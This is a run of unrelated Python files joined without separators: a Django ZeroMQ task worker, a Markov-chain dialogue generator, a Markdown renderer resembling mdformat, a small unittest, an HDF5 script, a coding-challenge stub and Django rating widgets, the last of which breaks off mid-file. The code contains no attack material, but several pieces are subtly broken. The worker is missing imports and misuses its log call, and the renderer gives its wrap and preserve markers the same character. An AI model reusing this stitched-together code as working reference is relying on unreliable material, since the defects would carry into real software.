from django.core.management.base import BaseCommand, CommandError
from django.conf import settings

from registrations.models import Registration
from registrations import handlers
from registrations import tasks

class Command(BaseCommand):

    def log(self, message):
        f = open(settings.TASK_LOG_PATH, 'a')
        now = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)
        log_message = "%s\t%s\n" % (now, message)
        self.stdout.write(log_message)
        f.write(log_message)
        f.close()

    def handle(self, *args, **options):
        
        context = zmq.Context() 
        pull_socket = context.socket(zmq.PULL) 
        pull_socket.bind('tcp://*:7002') 
        self.log("Registration Worker ZMQ Socket Bound to 7002")
        
        while True:
            try: 
                data = pull_socket.recv_json() 
                task_name = data.pop('task')
                task_kwargs = data.pop('kwargs')
                self.log("Got task '%s' with kwargs: %s" % (task_name, task_kwargs))
                if hasattr(tasks, task_name):
                    result = getattr(tasks, task_name)(**task_kwargs)
                    self.log("Task '%s' result: %s" % (task_name, result))
                else:
                    self.log("Received unknown task: %s", task_name)
            except Exception, e: 
                self.log("Error: %s" % e)

        pull_socket.close()
        context.term()

#!/usr/bin/python
from noisemapper.mapper import *
#from collectors.lib import utils

### Define the object mapper and start mapping


def main():
#    utils.drop_privileges()
    mapper = NoiseMapper()
    mapper.run()

if __name__ == "__main__":
    main()

import numpy as np
from numpy import cumsum, sum, searchsorted
from numpy.random import rand
import math
import utils
import core.sentence as sentence
import core.markovchain as mc
import logging

logger = logging.getLogger(__name__)

# Dialogue making class. Need to review where to return a string, where to return a list of tokens, etc.
# setters: list of speakers, pronouns, priors etc.
# random transitions
# Internal: build list of structures:
#     e.g.{:speaker_name "Alice", :speaker_pronoun "she", :speaker_str "she", :speech_verb "said", :position "end"}
# Then end with fn that maps that out to a suitable string
#     e.g. "<SPEECH>, she said."
# External bit then replaces <SPEECH> with a markov-chain-generated sentence (or several).


class dialogue_maker(object):
    """Class to handle creating dialogue based on a list of speakers and a sentence generator."""
    def __init__(self, names, pronouns, mc):
        self.speakers = [{"name": n, "pronoun": p} for n, p in list(zip(names, pronouns))]
        self._transitions = self.make_transition_probs()
        self._speech_acts = ["said", "whispered", "shouted", "cried"]
        self._acts_transitions = [25, 2, 2, 2]
        self.mc = mc
        # self.seeds = seeds
        self.target_len = np.random.randint(5, 50, size=len(names))  # rough words per sentence

    def make_transition_probs(self):
        """Make transition matrix between speakers, with random symmetric biases added in"""
        n = len(self.speakers)  # TODO why this line ???
        transitions = np.random.randint(5, size=(n, n)) + 1
        transitions += transitions.transpose()
        for i in range(0, math.floor(n / 2)):
            s1 = np.random.randint(n)
            s2 = np.random.randint(n)
            transitions[s1][s2] += 10
            transitions[s2][s1] += 8
        return(transitions)

    def after(self, speaker_id):
        """Pick next person to speak"""
        row = self._transitions[speaker_id]
        sucessor = searchsorted(cumsum(row), rand() * sum(row))
        return sucessor

    def speaker_sequence(self, speaker_id, n):
        """Random walk through transitions matrix to produce a sequence of speaker ids"""
        seq = []
        for i in range(n):
            seq.append(speaker_id)
            speaker_id = self.after(speaker_id)
        return seq

    def speech_sequence(self, n):
        speech_acts_seq = []
        next_speech_id = 0
        for i in range(n):
            next_speech_id = searchsorted(cumsum(self._acts_transitions), rand() * sum(self._acts_transitions))
            speech_acts_seq.append(self._speech_acts[next_speech_id])
        return speech_acts_seq

    def seq_to_names(self, sequence):
        return([self.speakers[id] for id in sequence])

    def make_speech_bits(self, seeds):
        n = len(seeds)
        speaker_id = self.speaker_sequence(0, n)
        speech_acts_seq = self.speech_sequence(n)
        bits = []
        ss = sentence.SentenceMaker(self.mc)
        for i in range(n):
            sent_toks = ss.generate_sentence_tokens([seeds[i]], self.target_len[speaker_id[i]])
            sent_toks = ss.polish_sentence(sent_toks)
            bits.append({'speaker_name': self.speakers[speaker_id[i]]["name"],
                         'speech_act': speech_acts_seq[speaker_id[i]],
                         'seq_id': speaker_id[i],
                         'speech': sent_toks,
                         'paragraph': True})
        return(bits)

    def simplify(self, seq_map):
        "Take a sequence of speech parts and make more natural by removing name reptition etc."
        for i in range(0, len(seq_map)):
            seq_map[i]['speaker_str'] = seq_map[i]['speaker_name']  # default
            # Same speaker contiues:
            if i > 0 and seq_map[i]['seq_id'] == seq_map[i - 1]['seq_id']:
                seq_map[i]['speaker_str'] = ""
                seq_map[i]['speech_act'] = ""
                seq_map[i]['paragraph'] = False
            else:
                if i > 1 and seq_map[i]['seq_id'] == seq_map[i - 2]['seq_id'] \
                   and seq_map[i]['seq_id'] != seq_map[i - 1]['seq_id']:
                    seq_map[i]['speaker_str'] = ""
                    seq_map[i]['speech_act'] = ""
                    seq_map[i]['paragraph'] = True
        return seq_map

    def report_seq(self, seq_map):
        """Convert sequence of speeches to a tokens."""
        sents = []
        for i in range(0, len(seq_map)):

            if seq_map[i]['paragraph']:
                # text += "\n    "
                quote_start = '"'
            else:
                quote_start = ""
            if i > len(seq_map) - 2 or seq_map[i + 1]['paragraph']:
                quote_end = '"'
            else:
                quote_end = " "
            if len(seq_map[i]['speech_act']) > 0:
                speech_act = seq_map[i]['speech_act'] + ","
            else:
                speech_act = seq_map[i]['speech_act']
            tokens = [utils.START_TOKEN]
            tokens.append(seq_map[i]['speaker_str'])
            tokens.append(speech_act)
            tokens.append(quote_start)
            tokens.extend(seq_map[i]['speech'][1:-1])
            tokens.append(quote_end)
            tokens.append(utils.END_TOKEN)
            sents.append(tokens)
        return sents

    def make_dialogue(self, seeds):
        """Returns a list of sentences, each being a list of tokens."""
        acts = self.make_speech_bits(seeds)
        seq_map = self.simplify(acts)
        sents = self.report_seq(seq_map)
        return(sents)


def dev():
    import knowledge.names as names

    mcW = mc.MarkovChain()
    nm = names.NameMaker()
    speakers = [nm.random_person() for i in range(1, 4)]
    dm = dialogue_maker([n['name'] for n in speakers], [n['pronoun'] for n in speakers], mcW)
    dlg = dm.make_dialogue(["dog", "run", "spot"])
    print(dlg)

# -*- coding: utf-8 -*-

from django.contrib.admin import TabularInline
from .models import GalleryPhoto


class PhotoInline(TabularInline):
    """
    Tabular inline that will be displayed in the gallery form during frontend
    editing or in the admin site.
    """
    model = GalleryPhoto
    fk_name = "gallery"

from __future__ import annotations

from collections import defaultdict
from collections.abc import Generator, Iterable, Mapping, MutableMapping
from contextlib import contextmanager
import logging
import re
import textwrap
from types import MappingProxyType
from typing import TYPE_CHECKING, Any, NamedTuple

from markdown_it.rules_block.html_block import HTML_SEQUENCES

from mdformat import codepoints
from mdformat._compat import Literal
from mdformat._conf import DEFAULT_OPTS
from mdformat.renderer._util import (
    RE_CHAR_REFERENCE,
    decimalify_leading,
    decimalify_trailing,
    escape_asterisk_emphasis,
    escape_underscore_emphasis,
    get_list_marker_type,
    is_tight_list,
    is_tight_list_item,
    longest_consecutive_sequence,
    maybe_add_link_brackets,
)
from mdformat.renderer.typing import Postprocess, Render

if TYPE_CHECKING:
    from mdformat.renderer import RenderTreeNode

LOGGER = logging.getLogger(__name__)

# A marker used to point a location where word wrap is allowed
# to occur.
WRAP_POINT = "\x00"
# A marker used to indicate location of a character that should be preserved
# during word wrap. Should be converted to the actual character after wrap.
PRESERVE_CHAR = "\x00"


def make_render_children(separator: str) -> Render:
    def render_children(
        node: RenderTreeNode,
        context: RenderContext,
    ) -> str:
        return separator.join(child.render(context) for child in node.children)

    return render_children


def hr(node: RenderTreeNode, context: RenderContext) -> str:
    thematic_break_width = 70
    return "_" * thematic_break_width


def code_inline(node: RenderTreeNode, context: RenderContext) -> str:
    code = node.content
    all_chars_are_whitespace = not code.strip()
    longest_backtick_seq = longest_consecutive_sequence(code, "`")
    if longest_backtick_seq:
        separator = "`" * (longest_backtick_seq + 1)
        return f"{separator} {code} {separator}"
    if code.startswith(" ") and code.endswith(" ") and not all_chars_are_whitespace:
        return f"` {code} `"
    return f"`{code}`"


def html_block(node: RenderTreeNode, context: RenderContext) -> str:
    content = node.content.rstrip("\n")
    # Need to strip leading spaces because we do so for regular Markdown too.
    # Without the stripping the raw HTML and Markdown get unaligned and
    # semantic may change.
    content = content.lstrip()
    return content


def html_inline(node: RenderTreeNode, context: RenderContext) -> str:
    return node.content


def _in_block(block_name: str, node: RenderTreeNode) -> bool:
    while node.parent:
        if node.parent.type == block_name:
            return True
        node = node.parent
    return False


def hardbreak(node: RenderTreeNode, context: RenderContext) -> str:
    if _in_block("heading", node):
        return "<br /> "
    return "\\" + "\n"


def softbreak(node: RenderTreeNode, context: RenderContext) -> str:
    if context.do_wrap and _in_block("paragraph", node):
        return WRAP_POINT
    return "\n"


def text(node: RenderTreeNode, context: RenderContext) -> str:
    """Process a text token.

    Text should always be a child of an inline token. An inline token
    should always be enclosed by a heading or a paragraph.
    """
    text = node.content

    # Escape backslash to prevent it from making unintended escapes.
    # This escape has to be first, else we start multiplying backslashes.
    text = text.replace("\\", "\\\\")

    text = escape_asterisk_emphasis(text)  # Escape emphasis/strong marker.
    text = escape_underscore_emphasis(text)  # Escape emphasis/strong marker.
    text = text.replace("[", "\\[")  # Escape link label enclosure
    text = text.replace("]", "\\]")  # Escape link label enclosure
    text = text.replace("<", "\\<")  # Escape URI enclosure
    text = text.replace("`", "\\`")  # Escape code span marker

    # Escape "&" if it starts a sequence that can be interpreted as
    # a character reference.
    text = RE_CHAR_REFERENCE.sub(r"\\\g<0>", text)

    # The parser can give us consecutive newlines which can break
    # the markdown structure. Replace two or more consecutive newlines
    # with newline character's decimal reference.
    text = text.replace("\n\n", "&#10;&#10;")

    # If the last character is a "!" and the token next up is a link, we
    # have to escape the "!" or else the link will be interpreted as image.
    next_sibling = node.next_sibling
    if text.endswith("!") and next_sibling and next_sibling.type == "link":
        text = text[:-1] + "\\!"

    if context.do_wrap and _in_block("paragraph", node):
        text = re.sub(r"\s+", WRAP_POINT, text)

    return text


def fence(node: RenderTreeNode, context: RenderContext) -> str:
    info_str = node.info.strip()
    lang = info_str.split(maxsplit=1)[0] if info_str else ""
    code_block = node.content

    # Info strings of backtick code fences cannot contain backticks.
    # If that is the case, we make a tilde code fence instead.
    fence_char = "~" if "`" in info_str else "`"

    # Format the code block using enabled codeformatter funcs
    if lang in context.options.get("codeformatters", {}):
        fmt_func = context.options["codeformatters"][lang]
        try:
            code_block = fmt_func(code_block, info_str)
        except Exception:
            # Swallow exceptions so that formatter errors (e.g. due to
            # invalid code) do not crash mdformat.
            assert node.map is not None, "A fence token must have `map` attribute set"
            filename = context.options.get("mdformat", {}).get("filename", "")
            warn_msg = (
                f"Failed formatting content of a {lang} code block "
                f"(line {node.map[0] + 1} before formatting)"
            )
            if filename:
                warn_msg += f". Filename: {filename}"
            LOGGER.warning(warn_msg)

    # The code block must not include as long or longer sequence of `fence_char`s
    # as the fence string itself
    fence_len = max(3, longest_consecutive_sequence(code_block, fence_char) + 1)
    fence_str = fence_char * fence_len

    return f"{fence_str}{info_str}\n{code_block}{fence_str}"


def code_block(node: RenderTreeNode, context: RenderContext) -> str:
    return fence(node, context)


def image(node: RenderTreeNode, context: RenderContext) -> str:
    description = _render_inline_as_text(node, context)

    if context.do_wrap:
        # Prevent line breaks
        description = description.replace(WRAP_POINT, " ")

    ref_label = node.meta.get("label")
    if ref_label:
        context.env["used_refs"].add(ref_label)
        ref_label_repr = ref_label.lower()
        if description.lower() == ref_label_repr:
            return f"![{description}]"
        return f"![{description}][{ref_label_repr}]"

    uri = node.attrs["src"]
    assert isinstance(uri, str)
    uri = maybe_add_link_brackets(uri)
    title = node.attrs.get("title")
    if title is not None:
        return f'![{description}]({uri} "{title}")'
    return f"![{description}]({uri})"


def _render_inline_as_text(node: RenderTreeNode, context: RenderContext) -> str:
    """Special kludge for image `alt` attributes to conform CommonMark spec.

    Don't try to use it! Spec requires to show `alt` content with
    stripped markup, instead of simple escaping.
    """

    def text_renderer(node: RenderTreeNode, context: RenderContext) -> str:
        return node.content

    def image_renderer(node: RenderTreeNode, context: RenderContext) -> str:
        return _render_inline_as_text(node, context)

    inline_renderers: Mapping[str, Render] = defaultdict(
        lambda: make_render_children(""),
        {
            "text": text_renderer,
            "image": image_renderer,
            "link": link,
            "softbreak": softbreak,
        },
    )
    inline_context = RenderContext(
        inline_renderers, context.postprocessors, context.options, context.env
    )
    return make_render_children("")(node, inline_context)


def link(node: RenderTreeNode, context: RenderContext) -> str:
    if node.info == "auto":
        autolink_url = node.attrs["href"]
        assert isinstance(autolink_url, str)
        # The parser adds a "mailto:" prefix to autolink email href. We remove the
        # prefix if it wasn't there in the source.
        if autolink_url.startswith("mailto:") and not node.children[
            0
        ].content.startswith("mailto:"):
            autolink_url = autolink_url[7:]
        return "<" + autolink_url + ">"

    text = "".join(child.render(context) for child in node.children)

    if context.do_wrap:
        # Prevent line breaks
        text = text.replace(WRAP_POINT, " ")

    ref_label = node.meta.get("label")
    if ref_label:
        context.env["used_refs"].add(ref_label)
        ref_label_repr = ref_label.lower()
        if text.lower() == ref_label_repr:
            return f"[{text}]"
        return f"[{text}][{ref_label_repr}]"

    uri = node.attrs["href"]
    assert isinstance(uri, str)
    uri = maybe_add_link_brackets(uri)
    title = node.attrs.get("title")
    if title is None:
        return f"[{text}]({uri})"
    assert isinstance(title, str)
    title = title.replace('"', '\\"')
    return f'[{text}]({uri} "{title}")'


def em(node: RenderTreeNode, context: RenderContext) -> str:
    text = make_render_children(separator="")(node, context)
    indicator = node.markup
    return indicator + text + indicator


def strong(node: RenderTreeNode, context: RenderContext) -> str:
    text = make_render_children(separator="")(node, context)
    indicator = node.markup
    return indicator + text + indicator


def heading(node: RenderTreeNode, context: RenderContext) -> str:
    text = make_render_children(separator="")(node, context)

    if node.markup == "=":
        prefix = "# "
    elif node.markup == "-":
        prefix = "## "
    else:  # ATX heading
        prefix = node.markup + " "

    # There can be newlines in setext headers, but we make an ATX
    # header always. Convert newlines to spaces.
    text = text.replace("\n", " ")

    # If the text ends in a sequence of hashes (#), the hashes will be
    # interpreted as an optional closing sequence of the heading, and
    # will not be rendered. Escape a line ending hash to prevent this.
    if text.endswith("#"):
        text = text[:-1] + "\\#"

    return prefix + text


def blockquote(node: RenderTreeNode, context: RenderContext) -> str:
    marker = "> "
    with context.indented(len(marker)):
        text = make_render_children(separator="\n\n")(node, context)
        lines = text.splitlines()
        if not lines:
            return ">"
        quoted_lines = (f"{marker}{line}" if line else ">" for line in lines)
        quoted_str = "\n".join(quoted_lines)
        return quoted_str


def _wrap(text: str, *, width: int | Literal["no"]) -> str:
    """Wrap text at locations pointed by `WRAP_POINT`s.

    Converts `WRAP_POINT`s to either a space or newline character, thus
    wrapping the text. Already existing whitespace will be preserved as
    is.
    """
    text, replacements = _prepare_wrap(text)
    if width == "no":
        return _recover_preserve_chars(text, replacements)

    wrapper = textwrap.TextWrapper(
        break_long_words=False,
        break_on_hyphens=False,
        width=width,
        expand_tabs=False,
        replace_whitespace=False,
    )
    wrapped = wrapper.fill(text)
    wrapped = _recover_preserve_chars(wrapped, replacements)
    return " " + wrapped if text.startswith(" ") else wrapped


def _prepare_wrap(text: str) -> tuple[str, str]:
    """Prepare text for wrap.

    Convert `WRAP_POINT`s to spaces. Convert whitespace to
    `PRESERVE_CHAR`s. Return a tuple with the prepared string, and
    another string consisting of replacement characters for
    `PRESERVE_CHAR`s.
    """
    result = ""
    replacements = ""
    for c in text:
        if c == WRAP_POINT:
            if not result or result[-1] != " ":
                result += " "
        elif c in codepoints.UNICODE_WHITESPACE:
            result += PRESERVE_CHAR
            replacements += c
        else:
            result += c
    return result, replacements


def _recover_preserve_chars(text: str, replacements: str) -> str:
    replacement_iterator = iter(replacements)
    return "".join(
        next(replacement_iterator) if c == PRESERVE_CHAR else c for c in text
    )


def paragraph(node: RenderTreeNode, context: RenderContext) -> str:  # noqa: C901
    inline_node = node.children[0]
    text = inline_node.render(context)

    if context.do_wrap:
        wrap_mode = context.options["mdformat"]["wrap"]
        if isinstance(wrap_mode, int):
            wrap_mode -= context.env["indent_width"]
            wrap_mode = max(1, wrap_mode)
        text = _wrap(text, width=wrap_mode)

    # A paragraph can start or end in whitespace e.g. if the whitespace was
    # in decimal representation form. We need to re-decimalify it, one reason being
    # to enable "empty" paragraphs with whitespace only.
    text = decimalify_leading(codepoints.UNICODE_WHITESPACE, text)
    text = decimalify_trailing(codepoints.UNICODE_WHITESPACE, text)

    lines = text.split("\n")
    for i in range(len(lines)):
        # Strip whitespace to prevent issues like a line starting tab that is
        # interpreted as start of a code block.
        lines[i] = lines[i].strip()

        # If a line looks like an ATX heading, escape the first hash.
        if re.match(r"#{1,6}( |\t|$)", lines[i]):
            lines[i] = f"\\{lines[i]}"

        # Make sure a paragraph line does not start with ">"
        # (otherwise it will be interpreted as a block quote).
        if lines[i].startswith(">"):
            lines[i] = f"\\{lines[i]}"

        # Make sure a paragraph line does not start with "*", "-" or "+"
        # followed by a space, tab, or end of line.
        # (otherwise it will be interpreted as list item).
        if re.match(r"[-*+]( |\t|$)", lines[i]):
            lines[i] = f"\\{lines[i]}"

        # If a line starts with a number followed by "." or ")" followed by
        # a space, tab or end of line, escape the "." or ")" or it will be
        # interpreted as ordered list item.
        if re.match(r"[0-9]+\)( |\t|$)", lines[i]):
            lines[i] = lines[i].replace(")", "\\)", 1)
        if re.match(r"[0-9]+\.( |\t|$)", lines[i]):
            lines[i] = lines[i].replace(".", "\\.", 1)

        # Consecutive "-", "*" or "_" sequences can be interpreted as thematic
        # break. Escape them.
        space_removed = lines[i].replace(" ", "").replace("\t", "")
        if len(space_removed) >= 3:
            if all(c == "*" for c in space_removed):
                lines[i] = lines[i].replace("*", "\\*", 1)  # pragma: no cover
            elif all(c == "-" for c in space_removed):
                lines[i] = lines[i].replace("-", "\\-", 1)
            elif all(c == "_" for c in space_removed):
                lines[i] = lines[i].replace("_", "\\_", 1)  # pragma: no cover

        # A stripped line where all characters are "=" or "-" will be
        # interpreted as a setext heading. Escape.
        stripped = lines[i].strip(" \t")
        if all(c == "-" for c in stripped):
            lines[i] = lines[i].replace("-", "\\-", 1)
        elif all(c == "=" for c in stripped):
            lines[i] = lines[i].replace("=", "\\=", 1)

        # Check if the line could be interpreted as an HTML block.
        # If yes, prefix it with 4 spaces to prevent this.
        for html_seq_tuple in HTML_SEQUENCES:
            can_break_paragraph = html_seq_tuple[2]
            opening_re = html_seq_tuple[0]
            if can_break_paragraph and opening_re.search(lines[i]):
                lines[i] = f"    {lines[i]}"
                break

    text = "\n".join(lines)

    return text


def list_item(node: RenderTreeNode, context: RenderContext) -> str:
    """Return one list item as string.

    This returns just the content. List item markers and indentation are
    added in `bullet_list` and `ordered_list` renderers.
    """
    block_separator = "\n" if is_tight_list_item(node) else "\n\n"
    text = make_render_children(block_separator)(node, context)

    if not text.strip():
        return ""
    return text


def bullet_list(node: RenderTreeNode, context: RenderContext) -> str:
    marker_type = get_list_marker_type(node)
    first_line_indent = " "
    indent = " " * len(marker_type + first_line_indent)
    block_separator = "\n" if is_tight_list(node) else "\n\n"

    with context.indented(len(indent)):
        text = ""
        for child_idx, child in enumerate(node.children):
            list_item = child.render(context)
            formatted_lines = []
            line_iterator = iter(list_item.split("\n"))
            first_line = next(line_iterator)
            formatted_lines.append(
                f"{marker_type}{first_line_indent}{first_line}"
                if first_line
                else marker_type
            )
            for line in line_iterator:
                formatted_lines.append(f"{indent}{line}" if line else "")

            text += "\n".join(formatted_lines)
            if child_idx != len(node.children) - 1:
                text += block_separator

        return text


def ordered_list(node: RenderTreeNode, context: RenderContext) -> str:
    consecutive_numbering = context.options.get("mdformat", {}).get(
        "number", DEFAULT_OPTS["number"]
    )
    marker_type = get_list_marker_type(node)
    first_line_indent = " "
    block_separator = "\n" if is_tight_list(node) else "\n\n"
    list_len = len(node.children)

    starting_number = node.attrs.get("start")
    if starting_number is None:
        starting_number = 1
    assert isinstance(starting_number, int)

    if consecutive_numbering:
        indent_width = len(
            f"{list_len + starting_number - 1}{marker_type}{first_line_indent}"
        )
    else:
        indent_width = len(f"{starting_number}{marker_type}{first_line_indent}")

    text = ""
    with context.indented(indent_width):
        for list_item_index, list_item in enumerate(node.children):
            list_item_text = list_item.render(context)
            formatted_lines = []
            line_iterator = iter(list_item_text.split("\n"))
            first_line = next(line_iterator)
            if consecutive_numbering:
                # Prefix first line of the list item with consecutive numbering,
                # padded with zeros to make all markers of even length.
                # E.g.
                #   002. This is the first list item
                #   003. Second item
                #   ...
                #   112. Last item
                number = starting_number + list_item_index
                pad = len(str(list_len + starting_number - 1))
                number_str = str(number).rjust(pad, "0")
                formatted_lines.append(
                    f"{number_str}{marker_type}{first_line_indent}{first_line}"
                    if first_line
                    else f"{number_str}{marker_type}"
                )
            else:
                # Prefix first line of first item with the starting number of the
                # list. Prefix following list items with the number one
                # prefixed by zeros to make the list item marker of even length
                # with the first one.
                # E.g.
                #   5321. This is the first list item
                #   0001. Second item
                #   0001. Third item
                first_item_marker = f"{starting_number}{marker_type}"
                other_item_marker = (
                    "0" * (len(str(starting_number)) - 1) + "1" + marker_type
                )
                if list_item_index == 0:
                    formatted_lines.append(
                        f"{first_item_marker}{first_line_indent}{first_line}"
                        if first_line
                        else first_item_marker
                    )
                else:
                    formatted_lines.append(
                        f"{other_item_marker}{first_line_indent}{first_line}"
                        if first_line
                        else other_item_marker
                    )
            for line in line_iterator:
                formatted_lines.append(" " * indent_width + line if line else "")

            text += "\n".join(formatted_lines)
            if list_item_index != len(node.children) - 1:
                text += block_separator

        return text


DEFAULT_RENDERERS: Mapping[str, Render] = MappingProxyType(
    {
        "inline": make_render_children(""),
        "root": make_render_children("\n\n"),
        "hr": hr,
        "code_inline": code_inline,
        "html_block": html_block,
        "html_inline": html_inline,
        "hardbreak": hardbreak,
        "softbreak": softbreak,
        "text": text,
        "fence": fence,
        "code_block": code_block,
        "link": link,
        "image": image,
        "em": em,
        "strong": strong,
        "heading": heading,
        "blockquote": blockquote,
        "paragraph": paragraph,
        "bullet_list": bullet_list,
        "ordered_list": ordered_list,
        "list_item": list_item,
    }
)


class RenderContext(NamedTuple):
    """A collection of data that is passed as input to `Render` and
    `Postprocess` functions."""

    renderers: Mapping[str, Render]
    postprocessors: Mapping[str, Iterable[Postprocess]]
    options: Mapping[str, Any]
    env: MutableMapping

    @contextmanager
    def indented(self, width: int) -> Generator[None, None, None]:
        self.env["indent_width"] += width
        try:
            yield
        finally:
            self.env["indent_width"] -= width

    @property
    def do_wrap(self) -> bool:
        wrap_mode = self.options.get("mdformat", {}).get("wrap", DEFAULT_OPTS["wrap"])
        return isinstance(wrap_mode, int) or wrap_mode == "no"

    def with_default_renderer_for(self, *syntax_names: str) -> RenderContext:
        renderers = dict(self.renderers)
        for syntax in syntax_names:
            if syntax in DEFAULT_RENDERERS:
                renderers[syntax] = DEFAULT_RENDERERS[syntax]
            else:
                renderers.pop(syntax, None)
        return RenderContext(
            MappingProxyType(renderers), self.postprocessors, self.options, self.env
        )

import teca.utils as tecautils
import teca.ConfigHandler as tecaconf
import unittest

class TestFileFilter(unittest.TestCase):
    def setUp(self):
        self.conf = tecaconf.ConfigHandler(
            "tests/test_data/configuration.json",
            {"starting_path": "tests/test_data/images"}
        )
        self.files_list = [
          "foo.doc",
          "yukinon.jpg",
          "cuteflushadoingflushathings.webm"
        ]

    def test_dothefiltering(self):
        self.assertTrue("foo.doc" not in
                        tecautils.filterImages(self.files_list,
                                               self.conf))
        self.assertTrue("yukinon.jpg" in
                        tecautils.filterImages(self.files_list,
                                               self.conf))

    def test_nofiles(self):
        self.assertEqual(0, len(tecautils.filterImages([], self.conf)))

#!/usr/bin/env python

from hdf5handler import HDF5Handler

handler = HDF5Handler('mydata.hdf5')
handler.open()

for i in range(100):
    handler.put(i, 'numbers')

handler.close()



"""
[2015-07-13] Challenge #223 [Easy] Garland words

https://www.reddit.com/r/dailyprogrammer/comments/3d4fwj/20150713_challenge_223_easy_garland_words/

# Description
A [_garland word_](http://blog.vivekhaldar.com/post/89763722591/garland-words) is one that starts and ends with the
same N letters in the same order, for some N greater than 0, but less than the length of the word. I'll call the
maximum N for which this works the garland word's _degree_. For instance, "onion" is a garland word of degree 2,
because its first 2 letters "on" are the same as its last 2 letters. The name "garland word" comes from the fact that
you can make chains of the word in this manner:
    onionionionionionionionionionion...
Today's challenge is to write a function `garland` that, given a lowercase word, returns the degree of the word if it's
a garland word, and 0 otherwise.
# Examples
    garland("programmer") -> 0
    garland("ceramic") -> 1
    garland("onion") -> 2
    garland("alfalfa") -> 4
# Optional challenges
1. Given a garland word, print out the chain using that word, as with "onion" above. You can make it as long or short
as you like, even infinite.
1. Find the largest degree of any garland word in the [enable1 English word
list](https://code.google.com/p/dotnetperls-controls/downloads/detail?name=enable1.txt).
1. Find a word list for some other language, and see if you can find a language with a garland word with a higher
degree.
*Thanks to /u/skeeto for submitting this challenge on /r/dailyprogrammer_ideas!*
"""


def main():
    pass


if __name__ == "__main__":
    main()

from decimal import Decimal

from django import forms
from django.template.loader import render_to_string
from django.template.defaultfilters import slugify

class BaseWidget(forms.TextInput):
    """
    Base widget. Do not use this directly.
    """
    template = None
    instance = None

    def get_parent_id(self, name, attrs):
        final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
        return final_attrs['id']

    def get_widget_id(self, prefix, name, key=''):
        if self.instance:
            opts = self.instance._meta
            widget_id = '%s-%s-%s_%s-%s' % (prefix, name, opts.app_label, opts.module_name, self.instance.pk)
        else:
            widget_id = '%s-%s' % (prefix, name)
        if key:
            widget_id = '%s_%s' % (widget_id, slugify(key))
        return widget_id

    def get_values(self, min_value, max_value, step=1):
        decimal_step = Decimal(str(step))
        value = Decimal(str(min_value))
        while value <= max_value:
            yield value
            value += decimal_step

class SliderWidget(BaseWidget):
    """
    Slider widget.

    In order to use this widget you must load the jQuery.ui slider
    javascript.

    This widget triggers the following javascript events:

    - *slider_change* with the vote value as argument
      (fired when the user changes his vote)
    - *slider_delete* without arguments
      (fired when the user deletes his vote)

    It's easy to bind these events using jQuery, e.g.::

        $(document).bind('slider_change', function(event, value) {
            alert('New vote: ' + value);
        });
    """
    def __init__(self, min_value, max_value, step, instance=None,
        can_delete_vote=True, key='', read_only=False, default='',
        template='ratings/slider_widget.html', attrs=None):
        """
        The argument *default* is used when the initial value is None.
        """
        super(SliderWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.step = step
        self.instance = instance
        self.can_delete_vote = can_delete_vote
        self.read_only = read_only
        self.default = default
        self.template = template
        self.key = key

    def get_context(self, name, value, attrs=None):
        # here we convert *min_value*, *max_value*, *step* and *value*
        # to string to avoid odd behaviours of Django localization
        # in the template (and, for backward compatibility we do not
        # want to use the *unlocalize* filter)
        attrs['type'] = 'hidden'
        return {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'step': str(self.step),
            'can_delete_vote': self.can_delete_vote,
            'read_only': self.read_only,
            'default': self.default,
            'parent': super(SliderWidget, self).render(name, value, attrs),
            'parent_id': self.get_parent_id(name, attrs),
            'value': str(value),
            'has_value': bool(value),
            'slider_id': self.get_widget_id('slider', name, self.key),
            'label_id': 'slider-label-%s' % name,
            'remove_id': 'slider-remove-%s' % name,
        }

    def render(self, name, value, attrs=None):
        context = self.get_context(name, value, attrs or {})
        return render_to_string(self.template, context)


class StarWidget(BaseWidget):
    """
    Starrating widget.

    In order to use this widget you must download the
    jQuery Star Rating Plugin available at
    http://www.fyneworks.com/jquery/star-rating/#tab-Download
    and then load the required javascripts and css, e.g.::

        <link href="/path/to/jquery.rating.css" rel="stylesheet" type="text/css" />
        <script type="text/javascript" src="/path/to/jquery.MetaData.js"></script>
        <script type="text/javascript" src="/path/to/jquery.rating.js"></script>

    This widget triggers the following javascript events:

    - *star_change* with the vote value as argument
      (fired when the user changes his vote)
    - *star_delete* without arguments
      (fired when the user deletes his vote)

    It's easy to bind these events using jQuery, e.g.::

        $(document).bind('star_change', function(event, value) {
            alert('New vote: ' + value);
        });
    """
    def __init__(self, min_value, max_value, step, instance=None,
        can_delete_vote=True, key='', read_only=False,
        template='ratings/star_widget.html', attrs=None):
        super(StarWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.step = step
        self.instance = instance
        self.can_delete_vote = can_delete_vote
        self.read_only = read_only
        self.template = template
        self.key = key

    def get_context(self, name, value, attrs=None):
        # here we convert *min_value*, *max_value* and *step*
        # to string to avoid odd behaviours of Django localization
        # in the template (and, for backward compatibility we do not
        # want to use the *unlocalize* filter)
        attrs['type'] = 'hidden'
        split_value = int(1 / self.step)
        if split_value == 1:
            values = range(1, self.max_value+1)
            split = u''
        else:
            values = self.get_values(self.min_value, self.max_value, self.step)
            split = u' {split:%d}' % split_value
        return {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'step': str(self.step),
            'can_delete_vote': self.can_delete_vote,
            'read_only': self.read_only,
            'values': values,
            'split': split,
            'parent': super(StarWidget, self).render(name, value, attrs),
            'parent_id': self.get_parent_id(name, attrs),
            'value': self._get_value(value, split_value),
            'star_id': self.get_widget_id('star', name, self.key),
        }

    def _get_value(self, original, split):
        if original:
            value = round(original * split) / split
            return Decimal(str(value))

    def render(self, name, value, attrs=None):
        context = self.get_context(name, value, attrs or {})
        return render_to_string(self.template, context)


class LikeWidget(BaseWidget):
    def __init__(self, min_value, max_value, instance=None,
        can_delete_vote=True, template='ratings/like_widget.html', attrs=None):
        super(LikeWidget, self).__init__(attrs)
        self.min_value = min_value
        self.max_value = max_value
        self.instance = instance
        self.can_delete_vote = can_delete_vote
        self.template = template
        
    def get_context(self, name, value, attrs=None):
        # here we convert *min_value*, *max_value* and *step*
        # to string to avoid odd behaviours of Django localization
        # in the template (and, for backward compatibility we do not
        # want to use the *unlocalize* filter)
        attrs['type'] = 'hidden'
        return {
            'min_value': str(self.min_value),
            'max_value': str(self.max_value),
            'can_delete_vote': self.can_delete_vote,
            'parent': super(LikeWidget, self).render(name, value, attrs),
